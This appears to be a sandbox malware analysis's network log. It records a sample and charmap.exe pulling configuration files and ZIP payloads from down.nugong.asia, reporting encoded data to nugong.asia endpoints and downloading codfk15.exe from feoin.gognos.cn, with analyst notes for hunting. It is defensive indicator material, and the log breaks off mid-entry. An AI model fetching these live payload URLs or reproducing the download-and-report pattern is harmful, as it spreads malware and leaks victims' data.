This is the lookup the "Unexpected DNS network traffic destination" signature refers to: it goes to 114.114.114.114 instead of the guest's resolver 8.8.8.8. The name resolves through a Tencent CDN (dnsv1.com.cn, tdnsv8.com) and the content below is served from Tencent COS (Server: tencent-cos): plain-text and JSON configuration files under /cfg/, and three ZIP payloads under /pgm/mds/ fetched by charmap.exe with the custom User-Agent CHM_MSDN. Since the CDN hands out many A records, block or hunt on the hostname and on the payload URL paths rather than on 119.167.229.212 alone.
-
Remote address: 119.167.229.212:80
Request:
GET /cfg/cmc/ping.txt HTTP/1.1
Host: down.nugong.asia
Response:
HTTP/1.1 200 OK
Etag: "bdf198e2733b39eae21f211114395f67"
Content-Type: text/plain
Date: Thu, 14 Sep 2023 14:23:31 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 3269775211629437622
x-cos-meta-md5: bdf198e2733b39eae21f211114395f67
x-cos-request-id: NjUwMzE3NjNfYTRmN2QxZV8yY2Q3M19mYzMzYTM=
Content-Length: 16
Accept-Ranges: bytes
X-NWS-LOG-UUID: 7129195975271880907
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address: 119.167.229.212:80
Request:
GET /cfg/cmc/ping.txt HTTP/1.1
Host: down.nugong.asia
Response:
HTTP/1.1 200 OK
Etag: "bdf198e2733b39eae21f211114395f67"
Content-Type: text/plain
Date: Thu, 14 Sep 2023 14:23:31 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 3269775211629437622
x-cos-meta-md5: bdf198e2733b39eae21f211114395f67
x-cos-request-id: NjUwMzE3NjNfYTRmN2QxZV8yY2Q3M19mYzMzYTM=
Content-Length: 16
Accept-Ranges: bytes
X-NWS-LOG-UUID: 7041402496685730997
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address: 119.167.229.212:80
Request:
GET /cfg/cmc/userchange.txt HTTP/1.1
Host: down.nugong.asia
Response:
HTTP/1.1 200 OK
Etag: "fc45e837e3ce86dbec3d2c37cf4902de"
Content-Type: text/plain
Date: Tue, 10 Oct 2023 09:20:23 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 12006462995938776668
x-cos-request-id: NjUyNTE3NTdfNGYyZmIwMDlfZWY3ZV82NGJlNTU2
Content-Length: 80
Accept-Ranges: bytes
X-NWS-LOG-UUID: 1752883517681810299
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address: 119.167.229.212:80
Request:
GET /cfg/cmc/userpq.zip HTTP/1.1
Host: down.nugong.asia
Response:
HTTP/1.1 200 OK
Etag: "adc490d0b07f1be911590c5b795aebea"
Content-Type: application/zip
Date: Sun, 15 Oct 2023 12:15:13 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 2623325120400499928
x-cos-request-id: NjUyYmQ3ZDFfNjNlZjk4MWVfMTM2MGFfNDFmMzk2ZA==
Content-Length: 14048
Accept-Ranges: bytes
X-NWS-LOG-UUID: 5713177746948184236
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address: 119.167.229.212:80
Request:
GET /cfg/cmc/blacklist.txt HTTP/1.1
Host: down.nugong.asia
Response:
HTTP/1.1 200 OK
Etag: "634229b217016f7ddbec9e50e2b2215a"
Content-Type: text/plain
Date: Tue, 14 Nov 2023 10:02:22 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 10822492973310145922
x-cos-request-id: NjU1MzQ1YWVfZWM0Y2JlMDlfYzBhY182ZDkxNjY1
Content-Length: 14128
Accept-Ranges: bytes
X-NWS-LOG-UUID: 11368800093448790513
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address: 119.167.229.212:80
Request:
GET /cfg/user/c995ec7fd4f57c0d/a8f5d6fe5664609d.json HTTP/1.1
Host: down.nugong.asia
Response:
HTTP/1.1 200 OK
Etag: "20b0141db067e42fab5d126b516ce8fc"
Content-Type: application/json
Date: Mon, 13 Nov 2023 05:39:43 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 6759049951230011836
x-cos-request-id: NjU1MWI2OWZfZDk5M2M1MDlfZDRkYl82YWU4ODgx
Content-Length: 5536
Accept-Ranges: bytes
X-NWS-LOG-UUID: 11897375171845853590
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address: 119.167.229.212:80
Request:
GET /cfg/pub/ms.json HTTP/1.1
Host: down.nugong.asia
Response:
HTTP/1.1 200 OK
Etag: "90c471dc2bc4708513d3942620d62b50"
Content-Type: application/json
Date: Thu, 16 Nov 2023 11:58:51 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 85938580248757588
x-cos-request-id: NjU1NjAzZmFfNjhlZTk4MWVfYjA4Y183N2JmY2Zl
Content-Length: 70816
Accept-Ranges: bytes
X-NWS-LOG-UUID: 7949643104443966097
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address: 119.167.229.212:80
Request:
GET /cfg/pub/ps.json HTTP/1.1
Host: down.nugong.asia
Response:
HTTP/1.1 200 OK
Etag: "da98b3f975d47ac8f8c82c818e2918f0"
Content-Type: application/json
Date: Thu, 16 Nov 2023 11:58:56 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 17045325299171296767
x-cos-request-id: NjU1NjA0MDBfYzMyNjgwOV8xMTZjXzk1OTU0OWE=
Content-Length: 14496
Accept-Ranges: bytes
X-NWS-LOG-UUID: 16963553139638466009
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
GET http://down.nugong.asia/pgm/mds/186dc678628340ee/90a22928787e3b5a341729d845ab26d5f93b9db0120714d864.zip (charmap.exe)
Remote address: 119.167.229.212:80
Request:
GET /pgm/mds/186dc678628340ee/90a22928787e3b5a341729d845ab26d5f93b9db0120714d864.zip HTTP/1.1
Host: down.nugong.asia
User-Agent: CHM_MSDN
Response:
HTTP/1.1 200 OK
Etag: "a84b646b1d930ce01381ef358a7553eb"
Content-Type: application/zip
Date: Mon, 13 Nov 2023 05:37:42 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 15716088766820099200
x-cos-request-id: NjU1MWI2MjZfNjMyNjgwOV8yZjdiXzcyNjM4ZWE=
Content-Length: 776248
Accept-Ranges: bytes
X-NWS-LOG-UUID: 500760231856281183
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
GET http://down.nugong.asia/pgm/mds/05631e93ccdb00ee/945f98f10df53a8f1cfb3848c371d6e3829473480dc6631564.zip (charmap.exe)
Remote address: 119.167.229.212:80
Request:
GET /pgm/mds/05631e93ccdb00ee/945f98f10df53a8f1cfb3848c371d6e3829473480dc6631564.zip HTTP/1.1
Host: down.nugong.asia
User-Agent: CHM_MSDN
Response:
HTTP/1.1 200 OK
Etag: "8cea813a8866e2b77e93c2a847204979"
Content-Type: application/zip
Date: Sat, 21 Oct 2023 09:04:02 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 5924644156334808127
x-cos-request-id: NjUzMzk0MDJfNWJlZDk4MWVfYmVkOV80Y2M2YjJi
Content-Length: 553108
Accept-Ranges: bytes
X-NWS-LOG-UUID: 17693798271994959229
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
GET http://down.nugong.asia/pgm/mds/006866ef1b75dc55/30d51089d778d32a4d22077fb983ba81fd82d4cf417ac62464.zip (charmap.exe)
Remote address: 119.167.229.212:80
Request:
GET /pgm/mds/006866ef1b75dc55/30d51089d778d32a4d22077fb983ba81fd82d4cf417ac62464.zip HTTP/1.1
Host: down.nugong.asia
User-Agent: CHM_MSDN
Response:
HTTP/1.1 200 OK
Etag: "d3ee55c63ac9cfa7fd408553f9369f5b"
Content-Type: application/zip
Date: Fri, 18 Aug 2023 07:42:38 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 11311802544265698830
x-cos-request-id: NjRkZjIwZWVfNTY1N2JiMDlfOGQ0Nl8zNGUyMDQ3
Content-Length: 902517
Accept-Ranges: bytes
X-NWS-LOG-UUID: 1174372281419468057
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address: 119.167.229.212:80
Request:
GET /cfg/cmc/Lander.txt HTTP/1.1
Host: down.nugong.asia
Response:
HTTP/1.1 200 OK
Etag: "2b0a274c713e2dbc2e5cbaeb685b7cb9"
Content-Type: text/plain
Date: Thu, 02 Nov 2023 08:57:25 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 5524331398157289202
x-cos-request-id: NjU0MzY0NzVfY2E5ZjA4MDlfMWVjYV82MDE2NWI1
Content-Length: 25440
Accept-Ranges: bytes
X-NWS-LOG-UUID: 12967380852860782898
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address: 119.167.229.212:80
Request:
GET /cfg/cmc/psexe.txt HTTP/1.1
Host: down.nugong.asia
Response:
HTTP/1.1 200 OK
Etag: "bbf519b79b44c56a5e57f25e7c9c2b09"
Content-Type: text/plain
Date: Thu, 16 Nov 2023 10:22:59 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 3618226480165307532
x-cos-request-id: NjU1NWVkODNfYTMzMjY4MDlfZTNlNl83NGY0NzVl
Content-Length: 17552
Accept-Ranges: bytes
X-NWS-LOG-UUID: 13708709213316926661
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address: 119.167.229.212:80
Request:
GET /cfg/cmc/urlmd5.json HTTP/1.1
Host: down.nugong.asia
Response:
HTTP/1.1 200 OK
Etag: "af00c53c210fdf6c89a35e31fab90718"
Content-Type: application/json
Date: Thu, 16 Nov 2023 12:02:58 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 17454991016677689058
x-cos-request-id: NjU1NjA0ZjJfNzljZDExMGJfMmYzNzhfZTM1MzcxZA==
Content-Length: 656
Accept-Ranges: bytes
X-NWS-LOG-UUID: 7984560787863337585
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
DNS apps.game.qq.com
Remote address: 8.8.8.8:53
Request: apps.game.qq.com IN A
Response:
apps.game.qq.com IN A 101.227.134.49
apps.game.qq.com IN A 101.227.134.27
-
Remote address: 101.227.134.49:443
Request:
GET /comm-htdocs/ip/get_ip.php HTTP/1.1
Accept-Encoding: gzip, deflate
Host: apps.game.qq.com
Connection: Close
Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 49
Connection: close
Server: swoole-http-server
Content-Encoding: gzip
-
DNS ocsp.trust-provider.cn
Remote address: 8.8.8.8:53
Request: ocsp.trust-provider.cn IN A
Response:
ocsp.trust-provider.cn IN CNAME ocsp.trust-provider.cn.c.vedcdnlb.com
ocsp.trust-provider.cn.c.vedcdnlb.com IN CNAME bd-l7-online-tob-oversea-opt.s.vedsalb.com
bd-l7-online-tob-oversea-opt.s.vedsalb.com IN A 36.143.236.7
bd-l7-online-tob-oversea-opt.s.vedsalb.com IN A 36.248.38.100
bd-l7-online-tob-oversea-opt.s.vedsalb.com IN A 111.13.153.152
bd-l7-online-tob-oversea-opt.s.vedsalb.com IN A 111.48.138.18
bd-l7-online-tob-oversea-opt.s.vedsalb.com IN A 111.206.23.199
bd-l7-online-tob-oversea-opt.s.vedsalb.com IN A 112.50.95.96
bd-l7-online-tob-oversea-opt.s.vedsalb.com IN A 117.27.246.96
bd-l7-online-tob-oversea-opt.s.vedsalb.com IN A 119.36.90.164
-
GET http://ocsp.trust-provider.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D (aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe)
Remote address: 36.143.236.7:80
Request:
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.trust-provider.cn
The User-Agent identifies this and the two ocsp.digicert.cn requests below as Windows CryptoAPI revocation checks (RFC 6960 OCSP over GET, the request DER base64-encoded in the path), which is what produced the CryptnetUrlCache files and the AuthRoot entries in the signatures above. They are certificate validation triggered by the sample and by charmap.exe, not command-and-control traffic.
Response:
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Content-Length: 599
Connection: keep-alive
Date: Thu, 16 Nov 2023 12:03:31 GMT
Age: 1
CF-Cache-Status: EXPIRED
CF-RAY: 826669fd7cf5ce8c-SJC
ETag: "5f2fef2f2105260951d9c24345a955796b1fd5d7"
Expires: Wed, 22 Nov 2023 09:19:05 GMT
Last-Modified: Wed, 15 Nov 2023 09:19:06 GMT
WS-Cache-Status: 0
X-CCACDN-Proxy-ID: scdpinlb4
X-Frame-Options: SAMEORIGIN
X-Via: 1.1 PS-CZX-01YIQ141:4 (Cdn Cache Server V2.0), 1.1 PS-PEK-01GFt24:12 (Cdn Cache Server V2.0)
X-Ws-Request-Id: 655603c5_PS-PEK-01GFt24_25725-26234
cache-via: cache.n173-145-133.bdcdn-hbcdcm02
x-request-ip: 154.61.71.13
x-tt-trace-tag: id=5
x-dsa-trace-id: 17001362117a57cebda9528039b01ac55e0e39b8e3
X-Bdsa-Cache-Status: HIT
Cache-Via-Status: cache.n173-145-133.bdcdn-hbcdcm02(HIT)
X-Bdsa-Cache-Tm: 1700135877-3266
Accept-Ranges: bytes
via: n173-145-133.bdcdn-hbcdcm02.ToB
X-Dsa-Origin-Status: 200
server-timing: cdn-cache;desc=HIT, origin;dur=0, edge;dur=0
-
Remote address: 8.8.8.8:53
Request
ocsp.digicert.cn IN A
Response
ocsp.digicert.cn IN CNAME ocsp.digicert.cn.w.cdngslb.com
ocsp.digicert.cn.w.cdngslb.com IN A 47.246.48.205
-
GET http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbJNRrm8KxusAb7DCqnMkE%3D (charmap.exe)
Remote address: 47.246.48.205:80
Request
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbJNRrm8KxusAb7DCqnMkE%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.digicert.cn
Response
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Content-Length: 471
Connection: keep-alive
Cache-Control: max-age=7200
Date: Thu, 16 Nov 2023 11:43:02 GMT
Ali-Swift-Global-Savetime: 1700134982
Via: cache2.l2de2[0,0,200-0,H], cache12.l2de2[0,0], cache5.nl2[0,0,200-0,H], cache7.nl2[1,0]
Age: 1229
X-Cache: HIT TCP_MEM_HIT dirn:1:348365936
X-Swift-SaveTime: Thu, 16 Nov 2023 11:43:02 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 2ff6309b17001362112167865e
-
GET http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D (charmap.exe)
Remote address: 47.246.48.205:80
Request
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.digicert.cn
Response
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Content-Length: 471
Connection: keep-alive
Cache-Control: max-age=7200
Date: Thu, 16 Nov 2023 11:43:25 GMT
Ali-Swift-Global-Savetime: 1700135005
Via: cache5.l2de2[14,14,200-0,M], cache4.l2de2[16,0], cache8.nl2[0,0,200-0,H], cache7.nl2[1,0]
Age: 1206
X-Cache: HIT TCP_MEM_HIT dirn:1:423183860
X-Swift-SaveTime: Thu, 16 Nov 2023 11:43:25 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 2ff6309b17001362113278050e
-
Remote address: 8.8.8.8:53
Request
sp1.baidu.com IN A
Response
sp1.baidu.com IN CNAME www.a.shifen.com
www.a.shifen.com IN CNAME www.wshifen.com
www.wshifen.com IN A 103.235.47.7
www.wshifen.com IN A 103.235.47.102
www.wshifen.com IN A 103.235.47.103
www.wshifen.com IN A 103.235.46.40
-
GET https://sp1.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json (charmap.exe)
Remote address: 103.235.47.7:443
Request
GET /8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json HTTP/1.1
Accept-Encoding: gzip
User-Agent: CHM_MSDN
Host: sp1.baidu.com
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Content-Length: 354
Content-Type: application/json;charset=gbk
Date: Thu, 16 Nov 2023 12:03:47 GMT
Expires: Thu, 16 Nov 2023 12:03:47 GMT
P3p: CP=" OTI DSP COR IVA OUR IND COM "
P3p: CP=" OTI DSP COR IVA OUR IND COM "
Server: Apache
Set-Cookie: BAIDUID=39C61BC447B3055DFAFABCC695373CB5:FG=1; expires=Fri, 15-Nov-24 12:03:47 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
Set-Cookie: BAIDUID=A028277FD5A679FD6E47394ADB1A61E6:FG=1; expires=Fri, 15-Nov-24 12:03:47 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
Tracecode: 02270995930429029386111620
Tracecode: 02271004770274315530111620
X-Powered-By: HHVM
-
Remote address: 8.8.8.8:53
Request
crl.globalsign.com IN A
Response
crl.globalsign.com IN CNAME global.prd.cdn.globalsign.com
global.prd.cdn.globalsign.com IN CNAME cdn.globalsigncdn.com.cdn.cloudflare.net
cdn.globalsigncdn.com.cdn.cloudflare.net IN A 104.18.20.226
cdn.globalsigncdn.com.cdn.cloudflare.net IN A 104.18.21.226
-
Remote address: 104.18.20.226:80
Request
GET /root-r3.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.globalsign.com
Response
HTTP/1.1 200 OK
Content-Type: application/pkix-crl
Content-Length: 2059
Connection: keep-alive
Last-Modified: Fri, 20 Oct 2023 00:00:00 GMT
ETag: 3A
Expires: Mon, 15 Jan 2024 00:00:00 GMT
Cache-Control: public, no-transform, must-revalidate, s-maxage=3600
CF-Cache-Status: HIT
Age: 3266
Accept-Ranges: bytes
Server: cloudflare
CF-RAY: 826f97a13a976657-AMS
-
GET http://ocsp2.globalsign.com/rootr3/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBT1nGh%2FJBjWKnkPdZIzB1bqhelHBwQUj%2FBLf6guRSSuTVD6Y5qL3uLdG7wCDQHuXyId%2FGI71DM6hVc%3D (charmap.exe)
Remote address: 104.18.21.226:80
Request
GET /rootr3/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBT1nGh%2FJBjWKnkPdZIzB1bqhelHBwQUj%2FBLf6guRSSuTVD6Y5qL3uLdG7wCDQHuXyId%2FGI71DM6hVc%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com
Response
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Content-Length: 1431
Connection: keep-alive
Expires: Mon, 20 Nov 2023 09:48:46 GMT
ETag: "b87def254cfbd1e1c7bbefdf93d58976a152baa5"
Last-Modified: Thu, 16 Nov 2023 09:48:47 GMT
Cache-Control: public, no-transform, must-revalidate, s-maxage=3600
CF-Cache-Status: HIT
Age: 2094
Accept-Ranges: bytes
Server: cloudflare
CF-RAY: 826f97e64c3db96f-AMS
-
GET http://down.nugong.asia/pgm/mds/b9aa4771a06003c1/4c3c71ab6fb06a3ec85c07a85e2af9e361998acec86eaa1e64.zip (charmap.exe)
Remote address: 119.167.229.212:80
Request
GET /pgm/mds/b9aa4771a06003c1/4c3c71ab6fb06a3ec85c07a85e2af9e361998acec86eaa1e64.zip HTTP/1.1
Host: down.nugong.asia
User-Agent: CHM_MSDN
Response
HTTP/1.1 200 OK
Etag: "2984d7173c0ef353247c5882127b6dea"
Content-Type: application/zip
Date: Wed, 18 Oct 2023 02:37:24 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 4837415142414469027
x-cos-request-id: NjUyZjQ0ZTRfMmVjYzExMGJfYzc0MV84OTBhYWE4
Content-Length: 153522
Accept-Ranges: bytes
X-NWS-LOG-UUID: 2161620244003400841
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
GET http://down.nugong.asia/pgm/mds/62761afc2f0d796a/2087d126bded15fb341729d845ab26d5124b01e56782ef7664.zip (charmap.exe)
Remote address: 119.167.229.212:80
Request
GET /pgm/mds/62761afc2f0d796a/2087d126bded15fb341729d845ab26d5124b01e56782ef7664.zip HTTP/1.1
Host: down.nugong.asia
User-Agent: CHM_MSDN
Response
HTTP/1.1 200 OK
Etag: "33a70d7d11445ae0e98eea790c06fdd0"
Content-Type: application/zip
Date: Mon, 13 Nov 2023 05:39:21 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 17548609442877028985
x-cos-request-id: NjU1MWI2ODlfYjczNTY4MDlfMWJhNV82YWQzNjc5
Content-Length: 980299
Accept-Ranges: bytes
X-NWS-LOG-UUID: 1647302354324036148
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
GET http://down.nugong.asia/pgm/mds/865609897d54b79b/502855f63d5364d77a01f5e8125b4fe59af4f34fd4851c3764.zip (charmap.exe)
Remote address: 119.167.229.212:80
Request
GET /pgm/mds/865609897d54b79b/502855f63d5364d77a01f5e8125b4fe59af4f34fd4851c3764.zip HTTP/1.1
Host: down.nugong.asia
User-Agent: CHM_MSDN
Response
HTTP/1.1 200 OK
Etag: "c54f8dd4a616b44898e054837fe698bc"
Content-Type: application/zip
Date: Wed, 18 Oct 2023 02:37:24 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 11477013737684468114
x-cos-request-id: NjUyZjQ0ZTRfYjQ5ZjA4MDlfYjc4M180NWFjN2M1
Content-Length: 153529
Accept-Ranges: bytes
X-NWS-LOG-UUID: 16758888000343519892
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
GET http://nreprot.nugong.asia/report/report_data?data=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.exe
Remote address: 119.167.229.212:80
Request
GET /report/report_data?data=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 HTTP/1.1
Host: nreprot.nugong.asia
Response
HTTP/1.1 200 OK
Date: Thu, 16 Nov 2023 12:04:06 GMT
Content-Type: text/html; charset=utf-8
X-AspNetMvc-Version: 5.2
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Cache-Lookup: Cache Miss
X-Cache-Lookup: Hit From Inner Cluster
Cache-Control: private
Content-Length: 3
X-NWS-LOG-UUID: 248686452332715798
Connection: keep-alive
X-Cache-Lookup: Cache Miss
-
GET http://mprrpt.nugong.asia/report.php?data=[hex payload removed] (charmap.exe)
Remote address: 119.167.229.212:80
Request
GET /report.php?data=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 HTTP/1.1
Host: mprrpt.nugong.asia
Response
HTTP/1.1 200 OK
Date: Thu, 16 Nov 2023 12:04:06 GMT
Content-Type: application/octet-stream
Content-Type: text/html
X-Cache-Lookup: Cache Miss
Content-Length: 3
X-NWS-LOG-UUID: 15826347961273132102
Connection: keep-alive
X-Cache-Lookup: Cache Miss
-
Remote address: 8.8.8.8:53
Request
feoin.gognos.cn IN A
Response
feoin.gognos.cn IN A 43.249.192.68
feoin.gognos.cn IN A 222.173.195.26
-
Remote address: 43.249.192.68:59115
Request
GET /codfk15.exe HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: feoin.gognos.cn:59115
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Last-Modified: Wed, 08 Nov 2023 13:21:26 GMT
Accept-Ranges: bytes
ETag: "e3c1f4794612da1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 16 Nov 2023 12:04:08 GMT
Content-Length: 14780000
-
119.167.229.212:443 down.nugong.asia tls aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe 13.1kB 486.6kB 242 363
-
75.6kB 2.7MB 1311 1979
HTTP Request
GET http://down.nugong.asia/cfg/cmc/ping.txt
HTTP Response
200
HTTP Request
GET http://down.nugong.asia/cfg/cmc/ping.txt
HTTP Response
200
HTTP Request
GET http://down.nugong.asia/cfg/cmc/userchange.txt
HTTP Response
200
HTTP Request
GET http://down.nugong.asia/cfg/cmc/userpq.zip
HTTP Response
200
HTTP Request
GET http://down.nugong.asia/cfg/cmc/blacklist.txt
HTTP Response
200
HTTP Request
GET http://down.nugong.asia/cfg/user/c995ec7fd4f57c0d/a8f5d6fe5664609d.json
HTTP Response
200
HTTP Request
GET http://down.nugong.asia/cfg/pub/ms.json
HTTP Response
200
HTTP Request
GET http://down.nugong.asia/cfg/pub/ps.json
HTTP Response
200
HTTP Request
GET http://down.nugong.asia/pgm/mds/186dc678628340ee/90a22928787e3b5a341729d845ab26d5f93b9db0120714d864.zip
HTTP Response
200
HTTP Request
GET http://down.nugong.asia/pgm/mds/05631e93ccdb00ee/945f98f10df53a8f1cfb3848c371d6e3829473480dc6631564.zip
HTTP Response
200
HTTP Request
GET http://down.nugong.asia/pgm/mds/006866ef1b75dc55/30d51089d778d32a4d22077fb983ba81fd82d4cf417ac62464.zip
HTTP Response
200
HTTP Request
GET http://down.nugong.asia/cfg/cmc/Lander.txt
HTTP Response
200
HTTP Request
GET http://down.nugong.asia/cfg/cmc/psexe.txt
HTTP Response
200
HTTP Request
GET http://down.nugong.asia/cfg/cmc/urlmd5.json
HTTP Response
200
-
1.4kB 5.1kB 15 13
HTTP Request
GET https://apps.game.qq.com/comm-htdocs/ip/get_ip.php
HTTP Response
200
-
119.167.229.212:443 down.nugong.asia tls aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe 1.5kB 1.1kB 10 11
-
36.143.236.7:80 http://ocsp.trust-provider.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D http aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe 910 B 3.2kB 9 6
HTTP Request
GET http://ocsp.trust-provider.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D
HTTP Response
200
-
47.246.48.205:80 http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D http charmap.exe 734 B 2.1kB 6 4
HTTP Request
GET http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbJNRrm8KxusAb7DCqnMkE%3D
HTTP Response
200
HTTP Request
GET http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D
HTTP Response
200
-
103.235.47.7:443 https://sp1.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json tls, http charmap.exe 1.5kB 11.3kB 19 22
HTTP Request
GET https://sp1.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json
HTTP Response
200
-
359 B 2.6kB 5 4
HTTP Request
GET http://crl.globalsign.com/root-r3.crl
HTTP Response
200
-
104.18.21.226:80 http://ocsp2.globalsign.com/rootr3/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBT1nGh%2FJBjWKnkPdZIzB1bqhelHBwQUj%2FBLf6guRSSuTVD6Y5qL3uLdG7wCDQHuXyId%2FGI71DM6hVc%3D http charmap.exe 473 B 2.1kB 5 4
HTTP Request
GET http://ocsp2.globalsign.com/rootr3/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBT1nGh%2FJBjWKnkPdZIzB1bqhelHBwQUj%2FBLf6guRSSuTVD6Y5qL3uLdG7wCDQHuXyId%2FGI71DM6hVc%3D
HTTP Response
200
-
119.167.229.212:80 http://mprrpt.nugong.asia/report.php?data=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.exe 28.7kB 1.3MB 552 969
HTTP Request
GET http://down.nugong.asia/pgm/mds/b9aa4771a06003c1/4c3c71ab6fb06a3ec85c07a85e2af9e361998acec86eaa1e64.zip
HTTP Response
200
HTTP Request
GET http://down.nugong.asia/pgm/mds/62761afc2f0d796a/2087d126bded15fb341729d845ab26d5124b01e56782ef7664.zip
HTTP Response
200
HTTP Request
